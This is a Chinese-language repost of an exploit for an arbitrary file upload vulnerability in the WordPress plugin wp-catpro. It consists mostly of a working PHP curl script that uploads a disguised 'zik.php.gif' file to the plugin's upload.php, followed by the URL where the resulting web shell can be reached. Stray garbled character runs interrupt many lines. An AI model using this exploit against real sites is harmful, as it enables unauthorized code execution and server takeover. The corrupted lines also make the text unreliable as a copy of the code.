WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
( M8 t; Q  V& D$ N$ D2 q#-----------------------------------------------------------------------

/ F* p( c* r1 u+ N1 A作者  => Zikou-16
邮箱 => zikou16x@gmail.com
3 l/ ~& d8 l8 U# B测试系统 : Windows 7 , Backtrack 5r3
' C" g3 C4 V- A, A" s7 E下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
; Z) A+ t7 E5 Q- p6 e####

9 A; V& ]$ F! \" F# O4 C# ]#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
, {5 M* |+ k4 d. r" w  K# ("jpg", "gif", "png")  // Allowed file extensions
8 |! w5 H- K% k" e/ P. c# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
& E; |8 e, h7 C! @- W5 O# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
2 G4 u3 {  z3 m0 v: k# \
1 |: o( T1 a0 J% N( ?% A6 R#=> Exploit
-----------
. V8 N! T& U: f+ t- e2 v<?php
: _/ w6 F7 j+ j& J5 Q. `
$uploadfile="zik.php.gif";
6 i" t& ]$ N) ]$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
2 I( m- Y4 a1 e1 ocurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
4 N: q- Q  U3 D* G0 Q0 Fcurl_close($ch);

print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
phpinfo();
?>